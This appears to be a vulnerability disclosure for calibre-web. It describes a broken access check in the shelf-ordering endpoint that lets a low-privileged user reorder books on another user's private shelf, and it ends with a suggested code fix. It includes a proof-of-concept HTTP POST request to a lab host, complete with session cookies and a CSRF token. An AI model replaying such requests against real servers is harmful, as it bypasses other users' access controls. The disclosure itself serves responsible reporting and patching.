With default settings, low-level users will not have permission to edit the sort order of books in private shelf of another user. However, due to incorrect checking, the application does not work as intended.
POST /shelf/order/3 HTTP/1.1
Host: 192.168.150.133:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 110
Origin: http://192.168.150.133:8083
Connection: close
Referer: http://192.168.150.133:8083/shelf/order/3
Cookie: session=.eJwljjtuAzEMBe-iOgV_4oq-zEKkSNgIkAC7dhXk7lkj3bx5zfy0vY487-32PF750fbHaremle4oAOUMmtFjRZ_OtapnRAayJktVokyrraoMttE7oW3ahZaJEfCQoVM3zgVAsiYNjjAuiU18GLuvyezl-D5gQhGJoLYr5HXm8V_D14zzqP35_ZlflwAtGIiKZkXxZpqDJ-lanmEis_fZC9vvH4AIP8o.Ye-55g.y2WeHCTSR6u3ZeXWL6zHGWmQWh4; remember_token=3|a0ad3ac22b2a1c95b6d18388d0186fbcd887a7b02378a4bb2498dc8a32770e173b14bae215b37137207d498cc4a6bdfd8c1b0784ee2f81085bebf3e6d3006edd
Upgrade-Insecure-Requests: 1
1=2&2=1&csrf_token=IjA2ZjA4MTE2MTk5ZjJjZjA4MTJhODNhMjZkZGJlYzk0NGE1NWE1ZjEi.Ye-55g.t3T1U1i3rXOQoAK-1Wi6sUtXm1I
In line 362 (https://github.com/janeczku/calibre-web/blob/master/cps/shelf.py#L362), server checks request’s method (POST) and processes the data directly, without checking the user’s permission to the shelf. I recommend putting code for user permissions check (https://github.com/janeczku/calibre-web/blob/master/cps/shelf.py#L380) at the top of order_shelf function.
Low-level user can edit the sort order of books in any shelf (include private shelf of another user).